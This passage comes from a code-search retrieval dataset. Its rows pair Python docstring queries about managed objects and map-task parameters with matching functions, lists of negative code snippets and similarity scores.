"0.5923505", "0.5920914", "0.591641", "0.591346", "0.591346", "0.591346", "0.591346", "0.591346", "0.591346", "0.591346", "0.591346", "0.591346", "0.59104764", "0.59045833", "0.58981895", "0.5897606", "0.58929044", "0.5888942" ]
0.0
-1
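For illustration only, a minimal runnable sketch of how a scheduler might call a get_schedule hook like the one in the row above; the Job class, its S_LATE constant and delay_interval attribute are assumptions introduced for this example, not part of the dataset row.

import datetime
import random

class Job:
    """Hypothetical job exposing the get_schedule hook shown in the row above."""
    S_LATE = "late"

    def __init__(self, delay_interval=None):
        self.delay_interval = delay_interval

    def get_schedule(self, status):
        # Late jobs are pushed a random amount of time into the future;
        # returning None removes the job from the schedule.
        if status == self.S_LATE and self.delay_interval:
            return datetime.datetime.now() + datetime.timedelta(
                seconds=random.random() * self.delay_interval)
        return None

job = Job(delay_interval=60)
print(job.get_schedule(Job.S_LATE))   # a datetime within the next minute
print(job.get_schedule("complete"))   # None -> job is dropped from the schedule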
Return managed object instance or id (applicable only when map_task is not None)
def get_managed_object(self): return self.key
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def managed_object_id(self):\n o = self._data[\"managed_object\"]\n if type(o) in (int, long):\n return o\n return o.id", "def _get_instance_id(self):\n return self.__instance_id", "def object_id(self) -> Optional[str]:\n return pulumi.get(self, \"object_id\")", "def object_id(self) -> Optional[str]:\n return pulumi.get(self, \"object_id\")", "def object_id(self) -> Optional[str]:\n return pulumi.get(self, \"object_id\")", "def object_id(o):\n return id(o)", "def object_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"object_id\")", "def object_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"object_id\")", "def object_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"object_id\")", "def object_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"object_id\")", "def object_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"object_id\")", "def object_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"object_id\")", "def objectid_for(obj_or_path_tuple):", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def getid(obj):\n try:\n return obj.id\n except AttributeError:\n return obj", "def _task_info_get(context, task_id, session=None):\n session = session or get_session()\n query = session.query(models.TaskInfo)\n query = query.filter_by(task_id=task_id)\n try:\n task_info_ref = query.one()\n except sa_orm.exc.NoResultFound:\n LOG.debug(\"TaskInfo was not found for task with id %(task_id)s\",\n {'task_id': task_id})\n task_info_ref = None\n\n return task_info_ref", "def get_instance(self, name):\n return self.store.instance.id", "def getid(obj):\n\n try:\n return obj.id\n except AttributeError:\n return obj", "def _retrieve_object_id(obj: Optional[Union[\"Base\", str]]) -> Optional[str]:\n # Check whether the obj is an object of any subclass of Base, or uuid type\n from pykechain.models import Base\n\n if issubclass(type(obj), Base):\n return obj.id\n elif isinstance(obj, str) and is_uuid(obj):\n return obj\n elif isinstance(obj, type(None)):\n return None\n else:\n raise 
IllegalArgumentError(\n \"When adding the widget, obj must be an instance of `Base` or an object id. \"\n \"Type is: {}\".format(type(obj))\n )", "def get_from_object_or_data(self, name):\n if self.instance and getattr(self.instance, name):\n return getattr(self.instance, name).id\n else:\n value = self.initial.get(name, self.data.get(name, None))\n if value:\n if isinstance(value, Story):\n return value.id\n else:\n return int(value)\n\n return None", "def object_id(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"object_id\")", "def object_id(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"object_id\")", "def helper_get_task_or_default(self):\n task_id = self.helper_retrieve_last_request_get_dict_key_val_index_zero_or_return_none(\"taskid\")\n alt_task_store_name = self.helper_retrieve_last_request_get_dict_key_val_index_zero_or_return_none(\"alt_task_store_name\")\n used_task_store = self.task_store\n # don't want to use sth like globals.get(alt_task_store) so that only approved stores can be used\n if alt_task_store_name == \"task_store_trash\":\n used_task_store = self.task_store_trash\n try:\n task = used_task_store.store_dict_id[task_id]\n except Exception as exc:\n # task_id is either None or it is not in store_dict_id\n util.dbgprint(\"exception in helper_get_task_or_default, semi-expected {}\".format(str(exc)))\n self.error_msg_queue_list.append(\"Couldn't retrieve requested note.\")\n return False, 0, 0, self.page_list_notes(no_history=True)\n return True, task_id, task, \"\"", "def id(obj):\n return obj", "def get_object(id):", "def get_object_id(resource):\n if hasattr(resource, \"object_id\"):\n return int(resource.object_id)\n\n return int(resource.id)", "def _get_id(self):\n return self.id", "def _get_marker_instance(ctx, marker):\n\n try:\n im = objects.InstanceMapping.get_by_instance_uuid(ctx, marker)\n except exception.InstanceMappingNotFound:\n raise exception.MarkerNotFound(marker=marker)\n\n elevated = ctx.elevated(read_deleted='yes')\n with context.target_cell(elevated, im.cell_mapping) as cctx:\n try:\n db_inst = db.instance_get_by_uuid(cctx, marker,\n columns_to_join=[])\n except exception.InstanceNotFound:\n db_inst = None\n if not db_inst:\n raise exception.MarkerNotFound(marker=marker)\n return db_inst", "def get_instance_id(self):\n return self.instance_id", "def getid(obj):\n\n # Try to return the object's UUID first, if we have a UUID.\n try:\n if obj.uuid:\n return obj.uuid\n except AttributeError:\n pass\n try:\n return obj.id\n except AttributeError:\n return obj", "def _get_task_id_from_xmodule_args(xmodule_instance_args):\r\n return xmodule_instance_args.get('task_id', UNKNOWN_TASK_ID) if xmodule_instance_args is not None else UNKNOWN_TASK_ID", "def identity(self):\n return self.id", "def object_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"object_id\")", "def object_for(objectid):", "def _get_task(self, task_id):\n if not task_id:\n return None\n task = objects.Transaction.get_by_uid(task_id, fail_if_not_found=False)\n if task and task.cluster_id == self.cluster.id:\n return task\n return False", "def sop_instance_uid(self) -> Optional[str]:\n return self._instance_uid", "def get_id(obj):\n\n id = callable(obj.id) and obj.id() or obj.id\n assert obj.getId() == id, \"expected identical ids: '%s' != '%s'\" \\\n % (obj.getId(), id)\n return id", "def get_object_id(self, key):\n try:\n return self.key_object[key]\n except KeyError:\n return None", "def get_objective_id(self):\n return Id(self._my_map['objectiveId'])", "def 
get_pk(self):\n return getattr(self, self.get_pk_name(), None)", "def get_objectID(self):\n return self.resource.uuid", "def get_object(self, queryset=None):\n obj = super().get_object()\n pk_lookup, dataid_lookup = self.lookup_fields\n form_pk = self.kwargs.get(pk_lookup)\n dataid = self.kwargs.get(dataid_lookup)\n\n if form_pk is not None and dataid is not None:\n try:\n int(dataid)\n except ValueError as e:\n raise ParseError(_(f\"Invalid dataid {dataid}\")) from e\n\n if not obj.is_merged_dataset:\n obj = get_object_or_404(\n Instance, pk=dataid, xform__pk=form_pk, deleted_at__isnull=True\n )\n else:\n xforms = obj.mergedxform.xforms.filter(deleted_at__isnull=True)\n pks = list(xforms.values_list(\"pk\", flat=True))\n\n obj = get_object_or_404(\n Instance, pk=dataid, xform_id__in=pks, deleted_at__isnull=True\n )\n\n return obj", "def get_id(self) -> Optional[str]:\n return self.id_", "def object_pk(self):\n\n if self._wrapped not in (None, empty):\n return str(self._wrapped.pk)\n\n if '_object_pk' in self.__dict__:\n return self.__dict__['_object_pk']\n\n identifier = self._get_identifier()\n if identifier:\n # noinspection PyBroadException\n try:\n object_pk = identifier.split('.', 2)[-1]\n if object_pk == 'None':\n object_pk = None\n self.__dict__['_object_pk'] = object_pk\n return object_pk\n except Exception:\n pass\n\n raise AttributeError()", "def get_id(self):\n pass", "def get_id(self):\n pass", "def get_id(self):\n pass", "def get_id(self):\n pass", "def instance_id(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"instance_id\")", "def instance_id(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"instance_id\")", "def instance_id(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"instance_id\")", "def get_objectID(self):\n return self.collection.uuid", "def get_custom_object_id():\n worker = ray.worker.global_worker\n object_id = ray._raylet.compute_put_id(worker.current_task_id,\n worker.task_context.put_index)\n worker.task_context.put_index += 1\n return object_id", "def task(self) -> base_model.BaseTask:\n return self._task", "def instance_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"instance_id\")", "def instance_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"instance_id\")", "def instance_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"instance_id\")", "def instance_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"instance_id\")", "def _create_instance(**kwargs):\n ctxt = context.get_admin_context()\n return db.instance_create(ctxt, _create_instance_dict(**kwargs))['id']", "def _object_get(self, pk):\n try:\n return self.model.objects.get(pk=pk)\n except self.model.DoesNotExist:\n raise DoesNotExist(self.model.__name__.lower(), primary_key=pk)", "def get_task(self, id):\n\n collection = self._get_collection()\n\n item = collection.find_one({\"_id\": ObjectId(id)})\n\n if item:\n return _mongo_item_to_task(item)\n else:\n return None", "def getId(self):\n # XXX-Aurel : this must be based on the GID definition\n # As GID in TioSafe case is unique, it must be used to get\n # the last ID of an inserted object (usefull for cases where\n # transactionnal operation is not provided like with prestashop)\n #raise ValueError, self.last_id\n return LastIdBrain.getId(self)", "def get_object(self):\n if getattr(self, 'current_instance', None):\n ret = self.current_instance\n else:\n ret = super().get_object()\n return ret", "def 
get_module_task_instance_id(task_instances):\n for id in task_instances:\n if task_instances[id] == 'module_node':\n return id\n return None", "def single_sign_on_managed_application_instance_id(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"single_sign_on_managed_application_instance_id\")" ]
[ "0.6440617", "0.6409251", "0.62016565", "0.62016565", "0.62016565", "0.6111818", "0.60688394", "0.60688394", "0.60688394", "0.60688394", "0.60688394", "0.60688394", "0.5931027", "0.59163266", "0.59163266", "0.59163266", "0.59163266", "0.59163266", "0.59163266", "0.59163266", "0.59163266", "0.59163266", "0.59163266", "0.59163266", "0.59163266", "0.59163266", "0.59163266", "0.59163266", "0.59163266", "0.59163266", "0.59163266", "0.59163266", "0.59163266", "0.59163266", "0.59163266", "0.59163266", "0.59163266", "0.59163266", "0.59163266", "0.59163266", "0.59163266", "0.59163266", "0.59163266", "0.59163266", "0.59163266", "0.59163266", "0.59163266", "0.59163266", "0.59163266", "0.5880694", "0.5842702", "0.58404994", "0.58098906", "0.5780218", "0.56764966", "0.5667065", "0.5667065", "0.56169796", "0.5605892", "0.56017953", "0.55892986", "0.5574743", "0.5573595", "0.5563259", "0.5549589", "0.5549122", "0.55480087", "0.55343676", "0.55276424", "0.55276173", "0.55274343", "0.55145895", "0.5513257", "0.5481022", "0.5469212", "0.54655623", "0.54630154", "0.54597634", "0.5459083", "0.5448529", "0.5448529", "0.5448529", "0.5448529", "0.54458207", "0.54458207", "0.54458207", "0.54351", "0.54297596", "0.5417569", "0.5417013", "0.5417013", "0.5417013", "0.5417013", "0.54102015", "0.54036796", "0.54030734", "0.53961223", "0.5391137", "0.5380181", "0.5372297" ]
0.6038846
12
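A hedged sketch of how a caller might consume a get_managed_object accessor like the one in the row above, which can hand back either a plain id or a full object (the same pattern the managed_object_id negative in the list above follows); ManagedObjectTask, resolve_id and FakeManagedObject are hypothetical names used only for this example.

class ManagedObjectTask:
    """Hypothetical task that stores either a managed object or its id in self.key."""

    def __init__(self, key):
        self.key = key

    def get_managed_object(self):
        # Return managed object instance or id, as described in the query above.
        return self.key


def resolve_id(task):
    """Return the numeric id whether the task holds an id or a full object."""
    obj = task.get_managed_object()
    return obj if isinstance(obj, int) else obj.id


class FakeManagedObject:
    id = 7


print(resolve_id(ManagedObjectTask(42)))                   # 42 (already an id)
print(resolve_id(ManagedObjectTask(FakeManagedObject())))  # 7 (resolved from the object)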
Return dict containing job's MRT params (applicable only when map_task is not None)
def get_map_task_params(self): return {}
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_powermax_job_parameters():\n return dict(\n job_id=dict(type='str', required=True)\n )", "def construct_job_params(self, hook: Any) -> dict[Any, Any | None]:\n missing_params = self.required_params - set(self.job_params)\n if missing_params:\n raise AirflowException(f\"Missing the following required job_params: {', '.join(missing_params)}\")\n params = {}\n for prm in self.job_params:\n if prm in self.lookups:\n v = self._api_lookup(param=prm, hook=hook)\n params[prm] = v\n else:\n params[prm] = self.job_params[prm]\n return params", "def make_mapper_task_conf(self, taskid):\n return {\n 'jobid': self.id,\n 'taskid': taskid,\n 'mapper': self.mapper,\n 'cnt_reducers': self.cnt_reducers,\n 'input': map_input(self.id, taskid)\n }", "def _kwargs(self):\n dict = DAG._kwargs(self) \n if (self.job): \n dict[\"inputpaths\"] = self.job.inputpaths\n dict[\"outputpath\"] = self.job.outputpath\n dict[\"job\"] = \"%s()\" % self.job.__class__.__name__\n return dict", "def generate_template_dict(self):\n # Get the existing parameters\n params = super().generate_template_dict()\n\n # Add our custom parameters\n params['job_parameter_file'] = self.job_parameter_file\n params['job_output_directory'] = self.job_output_directory\n\n # Return the updated params\n return params", "def task_properties(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"task_properties\")", "def get_job_dict(self, selector):\n pass", "def accepted_params(self):\n return self.ptm.current_luiti_visualiser_env[\"additional_task_parameters\"]", "def get_params(self):\n return {'threshold': self.threshold,\n 'subsample': self.subsample,\n 'estimator': self.estimator,\n 'n_folds': self.n_folds,\n 'stratify': self.stratify,\n 'random_state': self.random_state,\n 'n_jobs': self.n_jobs}", "def get_params(self):\n params = {}\n for step in self.steps:\n params[step[0]] = step[1].get_params()\n return params", "def _get_task_args():\n task_name = FLAGS.task\n task_args = collections.OrderedDict()\n\n if task_name in TASK_FLAGS:\n task_flag_list = TASK_FLAGS[task_name]\n task_flag_dict = utils_impl.lookup_flag_values(task_flag_list)\n task_flag_prefix = TASK_FLAG_PREFIXES[task_name]\n for (key, value) in task_flag_dict.items():\n if key.startswith(task_flag_prefix):\n key = key[len(task_flag_prefix):].lstrip('_-')\n task_args[key] = value\n return task_args", "def Params(cls):\n p = super().Params()\n p.Define('train_task', None, 'Underlying task')\n p.Define('decode_task', None, 'Underlying task')\n p.Define('train_dataset_name', None, '')\n p.Define('decode_dataset_name', None, '')\n p.Define('train_steps_per_loop', 0, '')\n p.Define('decode_steps_per_loop', 0, '')\n return p", "def _get_time_params(self, cfg):\n for step_name in PipelineConfig.steps:\n params = dict()\n step_cfg = cfg.get(step_name)\n pipe_type = step_cfg.pipe_step.type\n params['pipe_type'] = pipe_type\n if not cfg[step_name].get('trainer', None):\n continue\n params['epochs'] = cfg[step_name].trainer.epochs\n self.params_dict[step_name] = params", "def test_task_params(self, task_mock):\n from sosbeacon.event.message import get_group_broadcast_task\n\n group_key = Mock()\n group_key.urlsafe.return_value = \"AGROUPKEY\"\n\n event_key = Mock()\n event_key.urlsafe.return_value = \"SOMEEVENTKEY\"\n\n message_key = Mock()\n message_key.urlsafe.return_value = \"SOMEMESSAGEKEY\"\n\n batch_id = \"THEBATCHID\"\n iteration = 19\n\n get_group_broadcast_task(\n group_key, event_key, message_key, batch_id, iteration)\n\n 
check_params = {\n 'group': 'AGROUPKEY',\n 'event': 'SOMEEVENTKEY',\n 'message': 'SOMEMESSAGEKEY',\n 'batch': 'THEBATCHID',\n 'cursor': '',\n 'iter': 19\n }\n self.assertEqual(check_params, task_mock.call_args[1]['params'])", "def gen_task_item(self) -> Dict[str, Any]:\n return {}", "def _get_params_ranges(task: str,) -> Dict[str, Any]:\n params_file = os.path.join(\n os.path.dirname(__file__), \"params\", \"xgboost.yml\"\n )\n params = utils.read_yaml(params_file)\n\n if \"regression\" in task.lower():\n params.update({\"objective\": \"reg:squarederror\"})\n return params\n if \"binary\" in task.lower():\n params.update({\"objective\": \"binary:logistic\"})\n return params\n raise ValueError(f\"{task} is not a supported task.\")", "def parse_settings(self, requested_kwargs):\n kwargs = {}\n task_list = []\n for qb in self.qubits:\n task = {}\n task_list_fields = requested_kwargs['task_list_fields']\n\n transition_name_v = task_list_fields.get('transition_name')\n tr_name = self.get_param_value('transition_name',\n qubit=qb.name,\n default=transition_name_v[1])\n task['transition_name'] = tr_name\n\n value_params = {'v_low': None, 'v_high': None, 'pts': None}\n # The information about the custom parameters above could be\n # Saved somewhere else to generalize all wrappers\n\n default = self.get_param_value(f'default_{tr_name}_amp180',\n qubit=qb.name)\n current = qb.parameters[f'{tr_name}_amp180']()\n max = self.get_param_value('max_drive_amp', qubit=qb.name)\n n = self.get_param_value('n', qubit=qb.name)\n\n for name, value in value_params.items():\n value = self.get_param_value(name, qubit=qb.name)\n if isinstance(value, str):\n value = eval(\n value.format(current=current,\n max=max,\n default=default,\n n=n))\n value_params[name] = value\n\n sweep_points_v = task_list_fields.get('sweep_points', None)\n if sweep_points_v is not None:\n # Get first dimension (there is only one)\n # TODO: support for more dimensions?\n sweep_points_kws = next(iter(\n self.kw_for_sweep_points.items()))[1]\n values = np.linspace(value_params['v_low'],\n value_params['v_high'],\n value_params['pts'])\n task['sweep_points'] = SweepPoints()\n task['sweep_points'].add_sweep_parameter(values=values,\n **sweep_points_kws)\n qb_v = task_list_fields.get('qb', None)\n if qb_v is not None:\n task['qb'] = qb.name\n\n for k, v in task_list_fields.items():\n if k not in task:\n task[k] = self.get_param_value(k,\n qubit=qb.name,\n default=v[1])\n\n task_list.append(task)\n\n kwargs['task_list'] = task_list\n\n kwargs_super = super().parse_settings(requested_kwargs)\n kwargs_super.update(kwargs)\n\n return kwargs_super", "def get_tasks_params(self):\n params = {}\n tasks = []\n\n for cmdparam in self.cmdline.params:\n if \":\" in cmdparam:\n # task:NAME=VALUE:NAME=VALUE:NAME=VALUE\n parts = cmdparam.split(\":\")\n taskparams = {}\n for taskparam in parts[1:]:\n if \"=\" in taskparam:\n (name, value) = taskparam.split(\"=\", 1)\n if name[:1] == \"_\" or name[-1:] == \"_\":\n raise Error(\"Setting special from command line not allowed\")\n taskparams[name] = value\n\n tasks.append((parts[0], taskparams))\n elif \"=\" in cmdparam:\n # NAME=VALUE\n (name, value) = cmdparam.split(\"=\", 1)\n if name[:1] == \"_\" or name[-1:] == \"_\":\n raise Error(\"Setting special _VARIABLES_ from command line not allowed\")\n params[name] = value\n else:\n # taskname\n tasks.append((cmdparam, {}))\n\n return (tasks, params)", "def task_to_dict(task):\n if not isinstance(task, Task):\n return None\n d = {}\n for a in vars(task):\n d[a] = 
getattr(task, a)\n return d", "def make_reducer_task_conf(self, taskid):\n return {\n 'jobid': self.id,\n 'taskid': taskid,\n 'reducer': self.reducer,\n 'output_dir': self.output_dir,\n 'inputs': [map_output(self.id, i, taskid) for i in \\\n range(self.cnt_mappers)]\n }", "def test_task_params(self, task_mock):\n from sosbeacon.event.message import get_student_broadcast_task\n\n student_key = Mock()\n student_key.urlsafe.return_value = \"ASTUDENTKEY\"\n\n event_key = Mock()\n event_key.urlsafe.return_value = \"ANEVENTKEY\"\n\n message_key = Mock()\n message_key.urlsafe.return_value = \"SOMEMESSAGEKEY\"\n\n batch_id = \"THEBATCHID\"\n\n get_student_broadcast_task(\n student_key, event_key, message_key, batch_id)\n\n check_params = {\n 'student': 'ASTUDENTKEY',\n 'event': 'ANEVENTKEY',\n 'message': 'SOMEMESSAGEKEY',\n 'batch': 'THEBATCHID',\n }\n self.assertEqual(check_params, task_mock.call_args[1]['params'])", "def _default_params(self) -> dict[str, Any]:\n return {\n \"max_tokens\": self.max_tokens,\n \"temperature\": self.temperature,\n \"top_p\": self.top_p,\n \"logprobs\": self.logprobs,\n \"echo\": self.echo,\n \"stop_sequences\": self.stop_sequences,\n \"repeat_penalty\": self.repeat_penalty,\n \"top_k\": self.top_k,\n \"n_threads\": self.n_threads,\n \"n_ctx\": self.n_ctx,\n \"n_gpu_layers\": self.n_gpu_layers,\n \"n_gqa\": self.n_gqa if self.n_gqa else None,\n \"n_parts\": self.n_parts,\n \"seed\": self.seed,\n \"f16_kv\": self.f16_kv,\n \"logits_all\": self.logits_all,\n \"vocab_only\": self.vocab_only,\n \"use_mlock\": self.use_mlock,\n \"n_batch\": self.n_batch,\n \"last_n_tokens_size\": self.last_n_tokens_size,\n \"streaming\": self.streaming,\n }", "def get_tasks(self) -> Dict[str, Any]:\n\n ret = {}\n for k, id in self.required_tasks.items():\n ret[k] = self.storage_socket.get_procedures(id=id)[\"data\"][0]\n\n return ret", "def get_task_params(jeditaskid):\n\n query = {'jeditaskid': jeditaskid}\n taskparams = JediTaskparams.objects.filter(**query).values()\n\n if len(taskparams) > 0:\n taskparams = taskparams[0]['taskparams']\n try:\n taskparams = json.loads(taskparams)\n except ValueError:\n pass\n\n # protection against surrogates\n if 'cliParams' in taskparams:\n taskparams['cliParams'] =taskparams['cliParams'].encode('utf-8', 'replace').decode(\"utf-8\", 'surrogateescape')\n\n return taskparams", "def get_task_worker(self):\r\n start, end = self.get_block()\r\n return {\r\n 'task_id':self.id,\r\n 'finished':self.finished,\r\n 'free_block':(start != end),\r\n 'keyword':self.keyword,\r\n 'chars':self.chars,\r\n 'algorithm':self.algorithm,\r\n 'start_point':start,\r\n 'end_point':end\r\n }", "def get_job(self) -> Union[Dict[Text, Text], CustomJob]:\n pass", "def get_task_parameters_as_string(self):\n\t\treturn call_sdk_function('PrlRunningTask_GetTaskParametersAsString', self.handle)", "def parameters(self) -> dict[str, Any]:\n return {\n \"IrrigationEfficiency\": self._get_textvar_value(\"IrrigationEfficiency\"),\n \"MaskMap\": self._get_textvar_value(\"MaskMap\"),\n \"start_time\": get_time(self.forcing.start_time).strftime(ISO_TIMEFMT),\n \"end_time\": get_time(self.forcing.end_time).strftime(ISO_TIMEFMT),\n }", "def _get_job_defaults():\n\n lines = []\n lines += '[Job]\\n'\n j = Job()\n for cj in j._config_names:\n v = getattr(j, cj)\n lines += '%s = %s\\n' % (cj, v)\n lines += '\\n'\n return lines", "def get_options(self) -> dict:\n assert self.task\n task_options = {\n **self.task.get_task_options(),\n **self.expr.task_expr_options,\n **self.task_options,\n }\n return 
task_options", "def get_parkey_map(self):\n parkey_map = self.selector.get_parkey_map()\n tpn_values = self.tpn_valid_values\n for key in self.get_extra_parkeys():\n if key in parkey_map and \"CORR\" not in key:\n continue\n parkey_map[key] = tpn_values.get(key, [])\n if key.endswith(\"CORR\"): # and parkey_map[key] == []:\n parkey_map[key] = [\"PERFORM\", \"OMIT\", \"NONE\", \"COMPLETE\", \"UNDEFINED\"]\n return parkey_map", "def parse_settings(self, requested_kwargs):\n kwargs = {}\n task_list = []\n for qb in self.qubits:\n task = {}\n task_list_fields = requested_kwargs['task_list_fields']\n\n value_params = {'t0': None, 'delta_t': None, 'pts': None}\n\n for name, value in value_params.items():\n value = self.get_param_value(name, qubit=qb.name)\n value_params[name] = value\n\n sweep_points_v = task_list_fields.get('sweep_points', None)\n if sweep_points_v is not None:\n # get first dimension (there is only one)\n # TODO: support for more dimensions?\n sweep_points_kws = next(iter(\n self.kw_for_sweep_points.items()))[1]\n values = np.linspace(\n value_params['t0'],\n value_params['t0'] + value_params['delta_t'],\n value_params['pts'])\n task['sweep_points'] = SweepPoints()\n task['sweep_points'].add_sweep_parameter(values=values,\n **sweep_points_kws)\n\n qb_v = task_list_fields.get('qb', None)\n if qb_v is not None:\n task['qb'] = qb.name\n\n for k, v in task_list_fields.items():\n if k not in task:\n task[k] = self.get_param_value(k,\n qubit=qb.name,\n default=v[1])\n\n task_list.append(task)\n\n kwargs['task_list'] = task_list\n\n kwargs_super = super().parse_settings(requested_kwargs)\n kwargs_super.update(kwargs)\n\n return kwargs_super", "def humanize_task_params(taskparams):\n taskparams_list = []\n jobparams_list = []\n\n for k in taskparams:\n rec = {'name': k, 'value': taskparams[k]}\n taskparams_list.append(rec)\n taskparams_list = sorted(taskparams_list, key=lambda x: x['name'].lower())\n\n jobparams = taskparams['jobParameters']\n if 'log' in taskparams:\n jobparams.append(taskparams['log'])\n\n for p in jobparams:\n if p['type'] == 'constant':\n ptxt = p['value']\n elif p['type'] == 'template':\n ptxt = \"<i>{} template:</i> value='{}' \".format(p['param_type'], p['value'])\n for v in p:\n if v in ['type', 'param_type', 'value']:\n continue\n ptxt += \" {}='{}'\".format(v, p[v])\n else:\n ptxt = '<i>unknown parameter type {}:</i> '.format(p['type'])\n for v in p:\n if v in ['type', ]:\n continue\n ptxt += \" {}='{}'\".format(v, p[v])\n jobparams_list.append(ptxt)\n jobparams_list = sorted(jobparams_list, key=lambda x: x.lower())\n\n return taskparams_list, jobparams_list", "def get_task_info(self):\n\n print()\n employee_name = self.task.get_employee_name()\n task_name = self.task.get_task_name()\n mins = self.task.get_time_spent()\n notes = self.task.get_notes()\n date = self.task.get_date()\n\n task = {\n 'employee_name': employee_name,\n 'task_name': task_name,\n 'mins': mins,\n 'notes': notes,\n 'date': date\n }\n\n return task", "def _GetRunParameters() -> dict[str, str]:\n result = {}\n for kv in FLAGS.ycsb_run_parameters:\n param, value = kv.split('=', 1)\n result[param] = value\n return result", "def test_task_params(self):\n from sosbeacon.event.message import get_contact_broadcast_task\n\n student_key = Mock()\n student_key.urlsafe.return_value = \"ASTUDENTKEY\"\n\n event_key = Mock()\n event_key.urlsafe.return_value = \"ANEVENTKEY\"\n\n message_key = Mock()\n message_key.urlsafe.return_value = \"SOMEMESSAGEKEY\"\n\n batch_id = \"THEBATCHID\"\n\n contact = {\n 
'name': 'Johny Jones',\n 'methods': (\n {'type': 't', 'value': '1234567890'},\n {'type': 'e', 'value': 'johny@jones.com'},\n )\n }\n\n task = get_contact_broadcast_task(\n event_key, message_key, student_key, contact, batch_id)\n\n check_params = {\n 'student': 'ASTUDENTKEY',\n 'event': 'ANEVENTKEY',\n 'message': 'SOMEMESSAGEKEY',\n 'batch': 'THEBATCHID',\n 'contact': json.dumps(contact),\n }\n self.assertEqual(check_params, task.extract_params())", "def workflow_search_dict_task_spec():\n return {\n 'input_key': 'manifest_dtool_task->result->items',\n 'search_key': 'initial_inputs->search',\n 'marker_key': 'initial_inputs->marker',\n 'limit': 1,\n 'expand': True,\n 'stored_data': True,\n 'output_key': 'search_dict_task->result',\n 'loglevel': logging.DEBUG\n }", "def params(self):\n return {'cfg': self.cfg,\n 'momentum': self.momentum,\n 'center': self.center,\n 'scale': self.scale,\n 'epsilon': self.epsilon,\n 'act_fn': self.act_fn}", "def use_task_specific_params(model, task):\n task_specific_params = model.config.task_specific_params\n\n if task_specific_params is not None:\n pars = task_specific_params.get(task, {})\n logger.info(f\"setting model.config to task specific params for {task}:\\n {pars}\")\n logger.info(\"note: command line args may override some of these\")\n model.config.update(pars)", "def parse_settings(self, requested_kwargs):\n kwargs = {}\n task_list = []\n for qb in self.qubits:\n task = {}\n task_list_fields = requested_kwargs['task_list_fields']\n\n value_params = {\n 'delta_t': None,\n 't0': None,\n 'n_periods': None,\n 'pts_per_period': None\n }\n for name, value in value_params.items():\n value = self.get_param_value(name, qubit=qb.name)\n value_params[name] = value\n\n sweep_points_v = task_list_fields.get('sweep_points', None)\n if sweep_points_v is not None:\n # Get first dimension (there is only one)\n # TODO: support for more dimensions?\n sweep_points_kws = next(iter(\n self.kw_for_sweep_points.items()))[1]\n values = np.linspace(\n value_params['t0'],\n value_params['t0'] + value_params['delta_t'],\n value_params['pts_per_period'] * value_params['n_periods'] +\n 1)\n task['sweep_points'] = SweepPoints()\n task['sweep_points'].add_sweep_parameter(values=values,\n **sweep_points_kws)\n\n ad_v = task_list_fields.get('artificial_detuning', None)\n if ad_v is not None:\n task['artificial_detuning'] = value_params['n_periods'] / \\\n value_params['delta_t']\n qb_v = task_list_fields.get('qb', None)\n if qb_v is not None:\n task['qb'] = qb.name\n\n for k, v in task_list_fields.items():\n if k not in task:\n task[k] = self.get_param_value(k,\n qubit=qb.name,\n default=v[1])\n\n task_list.append(task)\n\n kwargs['task_list'] = task_list\n\n kwargs_super = super().parse_settings(requested_kwargs)\n kwargs_super.update(kwargs)\n\n return kwargs_super", "def get_frontend_args(self) -> Dict[str, Any]:\n return {\n \"task_description\": \"Placeholder Task Description - Javascript failed to load\",\n \"frame_height\": 650,\n \"num_subtasks\": self.opts[\"subtasks_per_unit\"],\n \"question\": self.opts[\"eval_question\"],\n \"block_mobile\": True,\n \"get_task_feedback\": False, # TODO(#95) make option\n \"additional_task_description\": self.opts['additional_task_description'],\n }", "def _get_default_pipeline_params(\n project: str,\n location: str,\n root_dir: str,\n target_column: str,\n prediction_type: str,\n optimization_objective: str,\n transformations: str,\n train_budget_milli_node_hours: float,\n stage_1_num_parallel_trials: Optional[int] = None,\n 
